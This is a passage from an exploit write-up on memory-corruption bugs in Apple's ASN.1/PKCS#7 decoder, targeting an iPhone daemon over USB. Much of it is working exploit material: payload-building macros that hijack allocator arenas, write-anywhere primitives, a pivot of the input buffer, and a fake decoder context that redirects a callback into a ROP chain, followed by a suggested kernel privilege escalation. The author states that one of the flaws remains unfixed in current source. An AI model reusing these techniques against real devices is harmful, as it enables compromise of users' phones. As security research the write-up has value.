cons: cont [ 0 ]
prim: OCTET STRING [HEX DUMP]:<enveloped data>
cons: cont [ 0 ]
cons: SET

The enveloped data must be a valid ASN.1 encoding, matching the templates
we saw above. Roughly speaking, this is the equivalent of the following:

$ echo "Hello world" > input.txt
$ openssl ecparam -name secp521r1 -genkey -param_enc explicit -out private-key.pem
$ openssl req -new -x509 -key private-key.pem -out server.pem -days 730
$ openssl cms -encrypt -binary -aes256 -in input.txt -outform DER -out encrypted.der server.pem
$ openssl cms -inform DER -in encrypted.der -cmsout -print

encrypted.der looks somewhat like this:

prim: INTEGER :02
cons: SET
cons: cont [ 1 ]
prim: INTEGER :03
cons: cont [ 0 ]
cons: cont [ 2 ]
prim: OBJECT :id-ecPublicKey
<more stuff>

Great! There's our bitstring. We know the inner PKCS#7 will be handled by a
recursive call to `SecCmsMessageDecode`, and the error code of that parser,
if any, is totally discarded. This can be observed in `nss_cms_before_data`
and `nss_cms_decoder_work_data` respectively. It seems pretty good from our
perspective, because we do not need to worry whether the inner ASN.1 ends
abruptly and, most importantly, the recursive call to `SecCmsMessageDecode`
will create fresh Arenas. Remember our D constant when invoking the first
MAKE_ARENA64? Yeah, it will be unchanged between runs. It seems we can have
our cake and eat it. But not just yet... Let's recap what we have so far.

We build our bitstring inside an enveloped PKCS#7, which is contained in a
signed PKCS#7 allowing us to write constant values at constant addresses.
All those constant values and addresses come from the input itself.

-- 3.1 - Building blocks

Our target daemon is running on an iPhone, listening to USB and is ready to
consume the crafted PKCS#7. Back in 2016, USB restricted mode wasn't even a
thing and a lot of daemons were running Before First Unlock.

The full exploit itself is beyond the scope of this article and is left as
an exercise for the reader. The bug has been patched years ago, and it does
not preserve any value whatsoever today, except illustrating my thought
process at the time and introducing some creative ways of subverting the
ASN.1 decoding machinery, as we shall see below.

The basic idea is to first leak out the shared cache slide, then build a
relocated ROP strip offline, then send it back, and then finally pivot to
it. A couple of guiding lines are laid below, and mock-ups are included in
the attached source code:
step1 - the bruteforcer - preparatory step for guessing the scratch,
step2 - buffer switching - used for leaking out the shared cache slide,
step3 - the ROP pivot - the actual exploit payload.

We will now mostly concentrate on step2 and step3 because they contain some
interesting tricks. One major shortcoming of our MAKE_ARENA/WRITE technique
is that we can only write out constant values. To extract the shared cache
we must be able to write out live pointers.

While being focused on our write-primitive we have overlooked one important
aspect: the write itself is just a byproduct of what we have built so far.
Before we had a write primitive, we had an allocation primitive: we could
target a scratch area in memory and force allocation of state objects at
known locations. A viable scratch address can be found empirically: it can
be any writable area in our victim memory space that should stay relatively
constant between runs. It depends on the targeted application/daemon, but
in absence of a true infoleak, it's still easy to figure it out: vmmap is
your best friend; also the bruteforcer may be used as a poor man's vmmap.
Check out the heap, the shared cache data segment, the daemon itself, the
stacks, or whatever else floats your boat.

Remember that state objects contain one pointer from the shared cache: the
template itself. And while the parser is busy with our bitstring, we know
the template is `kSecAsn1BitStringTemplate`, which is as good as any other

First, we cause a state object allocation at a known address. This is done
by hijacking the Arena to some reasonably large unused scratch space (known
a priori), right before a new state object is allocated:

|<------------------------- SCRATCH ------------------------->|
| |
| |<------- State object -------->| |
| | | |
... top theTemplate dest ...

Afterwards, we punch some writes before and some writes after the pointer.

|<------------------------- SCRATCH ------------------------->|
| |
| |<------- State object -------->| |
| | | |
... top theTemplate dest ...
^^^^ ^^^^^^^^

We are effectively building a bitstring around the template pointer using
only constant writes to the scratch area. What should we write around the
pointer? Exactly, MAKE_ARENA/WRITE contraptions.

|<------------------------- SCRATCH ------------------------->|
| |
| |<------- State object -------->| |
| | | |
... xxxxtheTemplateyyyyy ...
^ ^^
| |+- WRITE64(theTemplate) contraption
| +- MAKE_ARENA64 contraption
+- start of run-time built bitstring

This ephemeral bitstring does not even have to have a well-formed tail.
Since we are inside an enveloped content, which is parsed by a recursive
`SecCmsMessageDecode` call, the error code is ignored. If we could pivot
the input buffer to this scratch area, it will pick up and write the
template to whatever desired location. The exploit is writing itself at
run-time, Inception-style.

But how do we pivot the input buffer? It does not seem to be part of the
state object, and to make it worse, it is kept by `SEC_ASN1DecoderUpdate`
in a CPU register. Even if it was kept on the stack, targeting `buf` means
we have exactly one chance. We cannot use MAKE_ARENA/WRITE(clean=0, ...) in
single-shot mode, because it exhibits +1 bleeding (there is a zeroing step
which goes over the write size + 1) and will clobber the adjacent variable;
and we cannot use MAKE_ARENA/WRITE(clean=1, ...) in multi-shot mode because
we risk having it accessed before it is fully pivoted.

Looking at `sec_asn1d_record_any_header` and `sec_asn1d_add_to_subitems`,
we notice the CPU register holding the input buffer is saved to the stack
and is reloaded before return. However, inside `sec_asn1d_add_to_subitems`
there is an assignment that looks interesting:

thing = sec_asn1d_zalloc();
thing->data = data;
state->subitems_tail->next = thing;

The code flow disassembly is laid out below:

MOV X0, X21
MOV X1, X20 // buf
MOV X2, X22 // len
BL _sec_asn1d_parse_leaf
BL _sec_asn1d_record_any_header

B _sec_asn1d_add_to_subitems

STP X24, X23, [SP,#-0x10+var_30]!
STP X22, X21, [SP,#0x30+var_20]
STP X20, X19, [SP,#0x30+var_10] // save buf register (x20)
STP X29, X30, [SP,#0x30+var_s0]
MOV X19, X0 // state
BL _sec_asn1d_zalloc
MOV X20, X0 // controlled alloc -> thing
LDR X8, [X19,#0x78] // x8 = state->subitems_head
CBZ X8, ...
LDR X8, [X19,#0x80] // x8 = state->subitems_tail
STR X20, [X8,#0x10] // state->subitems_tail->next = thing
STR X20, [X19,#0x80] // state->subitems_tail = thing
LDP X29, X30, [SP,#0x30+var_s0]
LDP X20, X19, [SP,#0x30+var_10] // restore buf register (x20)
LDP X22, X21, [SP,#0x30+var_20]
LDP X24, X23, [SP+0x30+var_30],#0x40

We know `sec_asn1d_zalloc` can be made to return whatever address we want,
because we can virtually create Arenas out of thin air. If we could point
`&` towards the location of X20 on the stack, we can
reload the register holding the input buffer to whatever `sec_asn1d_zalloc`
returns. That is the address of the ephemeral bitstring we previously built
inside the scratch area of the victim space. Remember, the scratch area can
can be determined empirically and is presumed at a constant address between
runs. Locating the exact stack address where X20 is held is just a matter
of using vmmap and/or the bruteforcer step in creative ways. Hint: a daemon
crashes and is reloaded. Go back in time and try to spot some things that
remained constant.

The plan is as follows: after building the new bitstring, which is capable
of writing live values, we create some more items. Recall we're slicing the
scratch space hence the addresses of the ephemeral bitstring as well as the
items and objects are considered known. We'll have a `SecAsn1Item` (serving
as `dest`) and a subitem (serving as `subitems_head`). And then we force a
hierarchy of three state objects: a grandfather object, a father object
whose parent is the previous one and a child object which does the writing.
The last object will smash its parent, filling in known values for: `dest`,
`parent` (known value), `subitems_head`, `subitems_tail`. Taking the trip
to `sec_asn1d_add_to_subitems` is just a matter of altering `state->place`
to `duringBitString` and `state->underlying_kind` to `SEC_ASN1_ANY`.

|<------------------------- SCRATCH ------------------------->|
| |
| +- parent -+ |
| v | |
... DYNSTRING SecAsn1Item subitem STATE ... STATE ... STATE ...
^^^^^ |

After smashing the secondary object, we end up with this:

|<------------------------- SCRATCH ------------------------->|
| |
| +- parent -+ |
| v | |
... DYNSTRING SecAsn1Item subitem STATE ... STATE ... STATE ...
| ^ ^ |
| | +-- subitems_head --+
| +-- dest -----------------------+
| +-- subitems_tail --+
| v
+-------------------> stack location of saved input buf

This technique has a nasty side-effect: after coercing `sec_asn1d_zalloc`
to return the desired address, `sec_asn1d_add_to_subitems` writes that same
address to itself, which means the first bytes that'll get picked up from
the newly pivoted `buf` will be the most significant bytes of the address.
A workaround is to have said address be `0x...23nn`. The reasoning behind
this is that 0x23 would be confused with a useless constructed bitstring
allowing us to skip the MSB of the address and get out of the danger zone
as quickly as possible. This should not be a major constraint, since the
scratch area should be larger than 16kB anyway. Because of how things add
up in the decoder, and working the arithmetic backwards, this imposes a
constraint on our scratch buffer to be located at `0x...20nn`. step2 shows
how this is accomplished (though you may need to fix STACK_RBP_RELATIVE to
match your library/framework).

sec_asn1d_parse_leaf: memcpy(0x10b5722e8 + 0 = 0x10b5722e8, "6666666666666666", 19)
sec_asn1d_parse_leaf: pre-existing value = 0x0
adjusting item->len (19) to 148, unused=0x4
STATE transition ...
sec_asn1d_parse_leaf: len=547, @479
sec_asn1d_parse_leaf: memcpy(0x10b5722e8 + 148 = 0x10b57237c, "540", 4)
sec_asn1d_parse_leaf: pre-existing value = 0x0
adjusting item->len (152) to 18446744073709551488, unused=0x540
STATE transition ...
sec_asn1d_parse_leaf: len=540, @486
sec_asn1d_parse_leaf: memcpy(0x10b5722e8 + 18446744073709551488 = 0x10b572268, "10b5720c0", 120)
sec_asn1d_parse_leaf: pre-existing value = 0x7fab5e801868
STATE transition ...
sec_asn1d_add_to_subitems:1880: zalloc(24) -> 0x10b572398 in arena o_pool/0x0 (left -1)
sec_asn1d_add_to_subitems:1890: alloc(1) -> 0x10b5723b0 in arena o_pool/0x0 (left 18446744073709551615)
adding to subitems_tail: 0x10b572258::0x7ffee4729138(0x7ffee4729148) <= 0x10b572398 <-- [E]
new ARENA -> o_pool/0x7fab5e805020 of size 2087
sec_asn1d_add_to_subitems:1880: zalloc(24) -> 0x7fab5e805020 in arena o_pool/0x7fab5e805020 (left 2031)
sec_asn1d_add_to_subitems:1890: alloc(1) -> 0x7fab5e805038 in arena o_pool/0x7fab5e805020 (left 2023)
adding to subitems_tail: 0x10b572258::0x10b572398(0x10b5723a8) <= 0x7fab5e805020
sec_asn1d_prepare_for_contents:1458: zalloc(35) -> 0x7fab5e805040 in arena o_pool/0x7fab5e805020 (left 1983)
sec_asn1d_parse_leaf: len=418, @18446603704184794972
sec_asn1d_parse_leaf: memcpy(0x7fab5e805040 + 0 = 0x7fab5e805040, "1000000010b57", 35)
sec_asn1d_parse_leaf: pre-existing value = 0x0
STATE transition ...
sec_asn1d_prepare_for_contents:1458: zalloc(29) -> 0x7fab5e805068 in arena o_pool/0x7fab5e805020 (left 1951)
sec_asn1d_push_state:429: zalloc(144) -> 0x7fab5e805088 in arena o_pool/0x7fab5e805020 (left 1807)
STATE transition ...
sec_asn1d_parse_leaf: len=375, @18446603704184795015
sec_asn1d_parse_leaf: memcpy(0x7fab5e805068 + 0 = 0x7fab5e805068, "7878787878787878", 19)
sec_asn1d_parse_leaf: pre-existing value = 0x0
adjusting item->len (19) to 148, unused=0x4
STATE transition ...
sec_asn1d_parse_leaf: len=353, @18446603704184795037
sec_asn1d_parse_leaf: memcpy(0x7fab5e805068 + 148 = 0x7fab5e8050fc, "518", 4)
sec_asn1d_parse_leaf: pre-existing value = 0x0
adjusting item->len (152) to 18446744073709551528, unused=0x518
STATE transition ...
sec_asn1d_parse_leaf: len=346, @18446603704184795044
sec_asn1d_parse_leaf: memcpy(0x7fab5e805068 + 18446744073709551528 = 0x7fab5e805010, "10b572611", 16)
sec_asn1d_parse_leaf: pre-existing value = 0x7fab5e805827
adjusting item->len (18446744073709551544) to 18446744073709551040, unused=0x0
STATE transition ...
sec_asn1d_prepare_for_contents:1458: zalloc(9) -> 0x10b572601 in arena o_pool/0x0 (left -1)
sec_asn1d_parse_leaf: len=324, @18446603704184795066
sec_asn1d_parse_leaf: memcpy(0x10b572601 + 0 = 0x10b572601, "10b503510", 8)

In case you missed it, the buffer was switched at [E] in the previous log.
As convoluted as it is, this method allows us to pivot from a static buffer
to a dynamically constructed one, capable of writing shared cache pointers
to any location that would help us leak the shared cache slide outside and
build the ROP strip as shown next, in step3.

We notice there is one particular callback that gets called during parsing:
`state->top->filter_proc(state->top->filter_arg)`. It looks powerful enough
to pivot to a ROP strip. Let's revise the `state->top` structure:

typedef struct sec_DecoderContext_struct {
PRArenaPool *our_pool;
PRArenaPool *their_pool;
void *their_mark;

sec_asn1d_state *current;
sec_asn1d_parse_status status;

SEC_ASN1NotifyProc notify_proc;
void *notify_arg;
PRBool during_notify;

SEC_ASN1WriteProc filter_proc;
void *filter_arg;
PRBool filter_only;
} SEC_ASN1DecoderContext;

We plan on creating a fake `SEC_ASN1DecoderContext`, fill in `filter_proc`
with a pivot gadget, then fill in `filter_arg` with the address of the ROP
strip. We are only interested in `filter_proc` and `filter_arg`, everything
else can be ignored because the ROP strip is not supposed to ever return.
After that, we cause another state object allocation and point its `top` to
our fake `SEC_ASN1DecoderContext`.

|<------------------------- SCRATCH ------------------------->|
| |
| +--------------------- top -+ |
| v | |
... ROP strip ... SEC_ASN1DecoderContext TEMP STATE TEMP STATE ...
^ | | ^ |

filter_proc (pivot) <-+ |          +------------+ 
+----- filter_arg -------------+ change top

We can use our write primitive to lay down the ROP strip and an incomplete
`SEC_ASN1DecoderContext` inside the scratch area. Then we trigger a couple
of object allocations so that one object can smash its parent `top`. This
is illustrated in step3.

Once we have the ROP running, we can use a kernel LPE. A good candidate is
CVE-2016-4656[5] + CVE-2016-4655[6] pair, which can be triggered from ROP

-- 4 - Fast forward

Five years later I decide to do this write-up, trying hard to remember some
details of the ancient exploit; I begin tinkering with the mock-ups and the
old library. I realise there were two bugs, not one, and I decide to check
out the latest and greatest source tarball: Security-59754.80.3, as of this
writing. Yep, still there.

Sadly, the fix for CVE-2016-1950 not only eliminated the bit/byte confusion
but also introduced new safety checks so that `data->Length` could not wrap
around. It meant we cannot reach the Arena structure by going backwards in

I wept.

And then I got completely black out drunk, though for completely unrelated
reasons. It was a fun night. But I digress...

-- 4.0 - Rolling the dice

Ignoring my terrible hangover, let's revisit the other bug, the logic flaw:
when the parser encounters an empty bitstring, `sec_asn1d_parse_bit_string`
takes a shortcut and then, later in `sec_asn1d_prepare_for_contents`, the
item is re-allocated with the wrong size. Please revisit section 2.2 for a

Right, it allocates the buffer anew but this time in `our_pool`, sized for
`state->contents_length` which -- in case of constructed bitstrings -- will
be for the next component only. Anything that gets allocated after that
point will be smashed by subsequent bitstrings. Armed with what we learned
so far, a trigger is trivial. We smash a state object to cause an immediate

REP_BITSTRING(0, 5, 'a');
REP_BITSTRING(0, 8 + 144 - 5, 'b');
REP_BITSTRING(0, 8, 'c');

if (len) {
START_BITSTRING(0, len - 1);
while (len) {

The 'a' part allocates 8 bytes, followed by a state object (144 bytes). The
first memcpy covered 5 bytes, so the next memcpy needs to cover 8 + 144 - 5
bytes. The 'b' part leaves the dest pointer dangling over the upcoming next
state object and then the 'c' part would smash the 'top' pointer resulting
in a reliable crasher.

sec_asn1d_prepare_for_contents: zalloc(8) -> 0x7ff006008dd0 in arena o_pool/0x7ff006008c20 (left 1615)
sec_asn1d_push_state: zalloc(144) -> 0x7ff006008dd8 in arena o_pool/0x7ff006008c20 (left 1471)
STATE transition 0x7ff006008d40 -> 0x7ff006008dd8
sec_asn1d_parse_leaf: memcpy(0x7ff006008dd0 + 0 = 0x7ff006008dd0, "61616161", 5)
sec_asn1d_parse_leaf: pre-existing value = 0x0
STATE transition 0x7ff006008dd8 -> 0x7ff006008d40
STATE transition 0x7ff006008d40 -> 0x7ff006008cb0
STATE transition 0x7ff006008cb0 -> 0x7ff006008d40
sec_asn1d_parse_leaf: memcpy(0x7ff006008dd0 + 5 = 0x7ff006008dd5, "6262626262626262", 147)
sec_asn1d_parse_leaf: pre-existing value = 0xf006006a20000000
STATE transition 0x7ff006008d40 -> 0x7ff006008cb0
STATE transition 0x7ff006008cb0 -> 0x7ff006008d40
sec_asn1d_push_state: zalloc(144) -> 0x7ff006008e68 in arena o_pool/0x7ff006008c20 (left 1327)
STATE transition 0x7ff006008d40 -> 0x7ff006008e68
sec_asn1d_parse_leaf: memcpy(0x7ff006008dd0 + 152 = 0x7ff006008e68, "6363636363636363", 8)
sec_asn1d_parse_leaf: pre-existing value = 0x7ff006006a20

This doesn't seem very exploitable, especially since `dest` is allocated
somewhere in `their_pool`, the state objects are allocated in `our_pool`
and we cannot touch the Arenas anymore. Or can we?

After studying the allocation pattern, we notice something which manifests
in a consistent manner after the 'b' segment:

state = 0x7fe18b80d068 top = 0x7fe18b803420 dest = 0x7fe18b803e68
state = 0x7fb3ad009268 top = 0x7fb3ad006e20 dest = 0x7fb3ad008a68
state = 0x7f9798809268 top = 0x7f9798806e20 dest = 0x7f9798808a68
state = 0x7fad49009268 top = 0x7fad49006e20 dest = 0x7fad49008a68
state = 0x7fb12880fa68 top = 0x7fb12880dc20 dest = 0x7fb12880be68
state = 0x7fe8a5809268 top = 0x7fe8a5806e20 dest = 0x7fe8a5808a68
state = 0x7fe1d4009268 top = 0x7fe1d4006e20 dest = 0x7fe1d4008a68
state = 0x7fb212809268 top = 0x7fb212806e20 dest = 0x7fb212808a68
state = 0x7fe7ca804668 top = 0x7fe7ca802220 dest = 0x7fe7ca803e68
state = 0x7fa123810068 top = 0x7fa12380dc20 dest = 0x7fa12380f868
state = 0x7fa1cc809268 top = 0x7fa1cc806e20 dest = 0x7fa1cc808a68
state = 0x7fc288009268 top = 0x7fc288006e20 dest = 0x7fc288008a68
state = 0x7fd054809268 top = 0x7fd054806e20 dest = 0x7fd054808a68
state = 0x7fa36a80f068 top = 0x7fa36a80cc20 dest = 0x7fa36a80e868
state = 0x7fdd63009268 top = 0x7fdd63006e20 dest = 0x7fdd63008a68
state = 0x7fd63b810068 top = 0x7fd63b80dc20 dest = 0x7fd63b80f868
state = 0x7fee16809268 top = 0x7fee16806e20 dest = 0x7fee16808a68
state = 0x7fd1a880da68 top = 0x7fd1a880bc20 dest = 0x7fd1a8803e68
state = 0x7ff7cf809268 top = 0x7ff7cf806e20 dest = 0x7ff7cf808a68
state = 0x7fdf82005068 top = 0x7fdf82002c20 dest = 0x7fdf82004868

With rather decent probability, we observe a repeating pattern of state/top
pair: 9268/6e20. These addresses are for illustrative purposes, the real
allocation pattern of the victim daemon we are attacking must be determined
empirically, by whatever means. It's not the addresses themselves that are
important, but rather the LSB of those addresses. Again, the state object
is always at a constant distance from the start of the Arena and `dest`
seems to be in 0xFFFF range. We could arrange the memory layout like this:

|<----- state object ----->|
| |
... [&Arena.limit - top] top, template, dest, ...
| |
|<---- SecAsn1Item ---->|
^ |
+-- to the Arena ---+

Since `state->dest` lies in close proximity of the state object, we can use
a partial write to reroute it to &state - 8, and then smash the Arena:

const unsigned FILLER_LEN = 8 + 144 - 5;
const unsigned long long LAST_STATE = 0x7fca4b809268;
const unsigned long long CURRENT_TOP = 0x7fca4b806e20;
const unsigned long long ARENA_LIMIT = LAST_STATE - 0x258; // fixed

REP_BITSTRING(0, 5, 'a');
// leave the pointer dangling over 'dest'
// place this right below 'top'
PUSHR(2 * 8, 'b'); // skip past 'top' and 'theTemplate'
// reroute 'dest' to LAST_STATE - 8 and smash the Arena
CONS_BITSTRING(3 + 2 + 3 + 16);
PUSH2(LAST_STATE - 8); // partial write
// rewrite the Arena
PUSH8(0x4141414141414150); // limit
PUSH8(0x4141414141414140); // avail

|<----- state object ----->|
| |
... [&Arena.limit - top] top, template, dest ...
| | |
|<---- SecAsn1Item ---->|<-----------+
^ |
+-- to the Arena ---+

sec_asn1d_parse_leaf: memcpy(0x7fe4190091d0 + 5 = 0x7fe4190091d5, "6262626262626262", 163)
sec_asn1d_parse_leaf: pre-existing value = 0xe419006e20000000
STATE transition 0x7fe419009140 -> 0x7fe4190090b0
STATE transition 0x7fe4190090b0 -> 0x7fe419009140
sec_asn1d_push_state:430: zalloc(144) -> 0x7fe419009268 in arena o_pool/0x7fe419009020 (left 1327)
STATE transition 0x7fe419009140 -> 0x7fe419009268
state = 0x7fe419009268
top = 0x7fe419006e20
theTemplate = 0x1001792e0
dest = 0x7fe419008a68
our_mark = 0x0
parent = 0x7fe419009140
contents_length = 3
pending = 2
consumed = 3
depth = 9
allocate = 0
indefinite = 0
sec_asn1d_parse_leaf: memcpy(0x7fe4190091d0 + 168 = 0x7fe419009278, "9260", 2)
sec_asn1d_parse_leaf: pre-existing value = 0x7fe419008a68
STATE transition 0x7fe419009268 -> 0x7fe419009140
STATE transition 0x7fe419009140 -> 0x7fe419009268
state = 0x7fe419009268
top = 0x7fe419006e20
theTemplate = 0x1001792e0
dest = 0x7fe419009260
our_mark = 0x0
parent = 0x7fe419009140
contents_length = 17
pending = 16
consumed = 3
depth = 9
allocate = 0
indefinite = 0
sec_asn1d_parse_leaf: memcpy(0x7fe419006e20 + 8688 = 0x7fe419009010, "4141414141414150", 16)
sec_asn1d_parse_leaf: pre-existing value = 0x7fe419009827

In effect, this means we are replacing Arena `limit/avail` with whatever
memory range we want, and then any further allocations will happen there.
We can again resort to a scratch area which will become our allocation

This approach of hijacking the Arena is probabilistic. Synthetic benchmarks
showed pretty good success rate -- around 30-40% -- so it may be that in a
real world scenario that would be somewhere up to 20%. Not exactly bad, but
not very good either. Debugging will be a royal pain in the ass but that's
not even terribly important; the success rate will be reduced even further
by whatever assumptions we may have to make down the road.

The hangover was still raging the day after the next one. I'll never drink
again! (that's probably a lie)

-- 4.1 - Dance, little bunny!

The less-than-stellar success rate is kinda bothersome, let's see if we can
do better. We have two pools of Arenas: `their_pool` and `our_pool`. The
former holds destination structures (aka `dest`) and the final values of
the parsing process (the reassembled bitstring from its constituents). The
latter holds intermediate values (eg: substrings) and state objects.

All Arenas have a default size of `SEC_ASN1_DEFAULT_ARENA_SIZE`=2048, with
the exception of the first `their_pool` Arena, which is 1024. Our bitstring
will ultimately exceed 2048, therefore we are guaranteed the arena code has
already depleted whatever Arena was active when entering the bitstring. It
means when the time comes to allocate a new `dest` it will happen inside a
fresh `their_pool` Arena.

Let's try to forcibly deplete `our_pool` Arena, too. This process will not
change the existing `dest`.


// len must be >= 2048, so that their_pool is already depleted.
// Now consume our_pool. We want to switch to a fresh Arena right
// after we generate a new 'dest'
for (unsigned k = 0; k < 8; k++) {

This process of creating empty objects has the net effect of consuming
`our_pool` without taking up too much space in the input. Side-note: the
empty bitstrings above are harmless, because they are not followed by any
other primitive substring component and therefore they will not trigger the
bug. Yet. At this point we have the guarantee that both pools are depleted.
Now we trigger the bug, overwriting the currently active state object:

// (continued)
REP_BITSTRING(0, 5, 'a');
// leave the pointer dangling over 'place'
REP_BITSTRING(0, FILLER_LEN + 6 * 8, 'b');
// Change 'place', 'pending' and a bunch of other fields
CONS_BITSTRING(len); // extend this construct to the end
PUSH4(5); // place: afterLength
PUSH4(0x20); // found_tag_modifiers: SEC_ASN1_CONSTRUCTED
PUSH8(0xdfULL); // check_tag_mask
PUSH8(3ULL); // found_tag_number
PUSH8(3ULL); // expect_tag_number
PUSH8(3ULL); // underlying_kind
PUSH8(0ULL); // contents_length: 0
PUSH8(1ULL + 92); // pending: +1
PUSH8(3ULL); // consumed
PUSH4(9); // depth
PUSH4(0); // bit_string_unused_bits
PUSH8(0ULL); // subitems_head
PUSH8(0ULL); // subitems_tail
PUSH3(1); // allocate: 1
PUSH1(1); // indefinite: 1

We make some select changes to the state object, while keeping unchanged
the values we don't need. Let's highlight the changes made to the object:

place = afterLength

because we want to go straight to `sec_asn1d_prepare_for_contents`. But we
must dodge `sec_asn1d_parse_leaf` tail switching to `beforeEndOfContents`,
and so we also need:

pending = whatever it was before (92) + 1

Once we reach `sec_asn1d_prepare_for_contents`, we have:

allocate = TRUE

and therefore a new `dest` will be allocated in `their_pool`. Since that
pool is already empty, we guarantee that the new `SecAsn1Item` will be the
first thing in a new `their_pool` Arena. We will hit an assert because we
are not supposed to be here unless `dest` was already NULL. We could set
it to NULL with our bug, however, that means we would need to obliterate
the `parent`, which raises further issues. While this is probably fixable,
we won't be concerning ourselves with it, because the assert does not exist
in Release binaries.

Later on, `contents_length` comes into play, and it works best for us if:

contents_length = 0

This allows us to clear the `pending` field and skip further allocations.
Finally, having also set:

indefinite = TRUE

we dodge again `afterEndOfContents`. The last piece clicks in place with:

found_tag_modifiers = SEC_ASN1_CONSTRUCTED

which switches to `duringConstructedString` then pushes a new state. This
new state gets allocated right at the beginning of `our_pool` Arena because
we already depleted the old one. At this point, the pools look like this:

state->dest ---------+
T: [next=0x0] [base] [limit] [avail] [Length=0x0, Data=NULL]
| ^

O: [next=0x0] [base] [limit] [avail] [state]

And then we follow-up with our old friend: trigger the bug again, without
leaving the parent construct. Since `dest` is the first block sliced from
`their_pool` Arena, shaving off its LSB will reroute `dest` to the Arena
structure itself. This results in a type confusion: Arena `next` and `base`
acting like a `SecAsn1Item` pointing to the old `dest`. We now trigger a
write of eight zeroes followed by one 0x10 byte, effectively keeping the
`dest->Length` to 0 and doing a partial overwrite over `dest->Data`, making
the old `dest` point to `&Arena.limit`. Finally, having popped back the old
`dest` we are now free to overwrite the Arena:

// (continued)
REP_BITSTRING(0, 5, 'c');
// leave the pointer dangling over 'dest'
REP_BITSTRING(0, FILLER_LEN + 2 * 8, 'd');
// temporarily make 'dest' overlap with their_pool Arena, by shaving off the LSB
CONS_BITSTRING(3 + 1 + 3 + 9);
// relocate 'dest' -> PLArena
PUSH1(0); // LSB = 0
// 'dest' is pointing to previous self, shave off the LSB of Data
PUSH8(0ULL); // Length
PUSH1(0x10); // LSB = 0x10
// 'dest' is popped back, with dest->Data pointing to our_pool Arena.limit
PUSH8(0x4141414141414150); // limit
PUSH8(0x4141414141414140); // avail

If that looks confusing it's because it really is. Perhaps some pictures
can clear it up.

After the break and the 'c' segment:

state->dest ---------+
T: [next=0x0] [base] [limit] [avail] [Length=0x0, Data]
| ^ |
+----------------------+ +----------+
O: [next=0x0] [base] [limit] [avail] [state] [block(sz=1/8)] [block(8)]

After the 'd' segment, shave off `dest` LSB:

+------------- state->dest
T: [next=0x0] [base] [limit] [avail] [Length=0x0, Data]
| ^ |
+----------------------+ +----------+
O: [next=0x0] [base] [limit] [avail] [state] [block(sz=1/8)] [block(8)]

Zero `dest->Length` and set `dest->Data` LSB = 0x10:

+------------- state->dest
T: [next=7*8] [base] [limit] [avail] [Length=0x0, Data]
| ^ |
+----------------------+ |
O: [next=0x0] [base] [limit] [avail] [state] [block(sz=1/8)] [block(8)]

After popping `dest`, smash `our_pool` Arena `limit/avail`:

state->dest ---------+
T: [next=7*8] [base] [limit] [avail] [Length=128, Data]
| ^ |
+----------------------+ |
O: [next=0x0] [base] [ END ] [BEGIN] [state] [block(sz=1/8)] [block(8)]

Woo-hooo! We just hijacked the current `our_pool` Arena. Where to? Well, to
our old friend, the scratch area. Once we are rocking the Arena at a known
address inside the victim space, we can predict absolutely all subsequent
allocations. Determining such a scratch address is again a matter of vmmap
and observing where the writable allocations end up. Refer to the attached
source code READMEs for more info.

NB: 0x4b4b4b4b4b4b4b.. in the examples below are all known addresses inside
the scratch area and can be presumed known/constant.

-- 4.2 - He who controls the Arena

Hijacking the Arena in a predictable manner is a big win but it proves to
be a much more complex process than it was before CVE-2016-1950 got fixed.
Unlike the old way, where we could create new Arenas out of thin air at the
snap of the fingers, this time we should keep a grip on the one we just got
a hold of. For this reason we abandon our MAKE_ARENA/WRITE contraptions and
switch to a different paradigm for achieving write-anywhere.

Having the Arena in the scratch space means that we know where everything
is laid out. We first generate whatever items we need right at the top of
our newly built Arena and then use the bug repeatedly to route `dest` to
them, in order to perform the writes. This is easy since we know the exact
address of each item. Example:

// SecAsn1Item:
PUSH8(0ULL); // Length
PUSH8(0x4343434343434343); // Data: WHERE we are writing

// repeat the evil scheme
REP_BITSTRING(0, 5, 'f');
// leave the pointer dangling over 'dest'
REP_BITSTRING(0, FILLER_LEN + 2 * 8, 'f');
// reroute 'dest' and perform the write
CONS_BITSTRING(3 + 8 + 3 + 8);
// 'dest' -> &SecAsn1Item = { 0, destination }
PUSH8(0x4b4b4b4b4b4b4b42); // &SecAsn1Item
// write
PUSH8(0x4646464646464646); // WHAT we are writing

Replace 0x4b4b4b4b4b4b4b42 with the exact address of the `SecAsn1Item`, as
we know it in advance (it's right at the top of the scratch space), and the
code above will perform:

*(uint64_t *)0x4343434343434343 = 0x4646464646464646;

At this point, our new bug is as capable as the old one: writing static
values at known addresses. However, one thing that was kinda bothersome
about the old exploit was that it was comprised of multiple steps and it
was relying on some difficult to guess stack address. Can we do this one
in a single step? Let's examine the richness of the decoding machinery and
see what kind of primitives it has to offer.

-- 4.2.0 - Copyout

By copyout, we mean the ability to copy any value from the scratch space to
any arbitrary address. `sec_asn1d_concat_substrings` can copy from subitems
into a new `their_pool` allocation. The relevant code in secasn1d.c is:

where = item->Data;
substring = state->subitems_head;
while (substring != NULL) {
if (is_bit_string)
item_len = (substring->len + 7) >> 3;
item_len = substring->len;
PORT_Memcpy (where, substring->data, item_len);
where += item_len;
substring = substring->next;

While we decided to never mess again with `our_pool` Arenas, that doesn't
apply to `their_pool` Arenas. As long as we stay under the mega-object used
for the initial hijack, `their_pool` will never be used by the decoder. It
means we can freely play with that pool and the easiest way to achieve this
is to create a completely new pool and replace it:

// reserve a bunch of subitems, items, PORTArenaPool and objects
START_BITSTRING(0, 24 + 24 + 8 * 8 + 7);
// subitem
PUSH8(0x4b4b4b4b4b4b4b41); // data: where we are copying out FROM
PUSH8(8ULL << 3); // len
PUSH8(0ULL); // next
// subitem
PUSH8(0x4545454545454545); // data: where we are copying in FROM
PUSH8(8ULL); // len
PUSH8(0ULL); // next
// PORTArenaPool
PUSH8(0); // (NULL, but could be chained)
PUSH8(0ULL); // PORTArenaPool.arena.first.base
PUSH8(0x4141414141414170); // PORTArenaPool.arena.first.limit
PUSH8(0x4141414141414160); // PORTArenaPool.arena.first.avail (copyout DESTINATION)
PUSH8(0x4b4b4b4b4b4b4b48); // PORTArenaPool.arena.current = &PORTArenaPool.arena
PUSH8(256ULL); // PORTArenaPool.arena.arenasize
PUSH8(7ULL); // PORTArenaPool.arena.mask
PUSH8(0xB8AC9BDFULL); // PORTArenaPool.magic
// this serves as overlapping SecAsn1Item with 'top' below
PUSH7(8ULL << 3); // Length: 8
// state (promptly discarded)

The scratch space will have the following layout:

|<-- real state object -->|
| |
[subitem] [PORTArenaPool] [ 8 ] [top] [template] [dest] ...
| |
|< fake item >|

The overlapping item is `{ 8, top }` and we can use our write primitive to
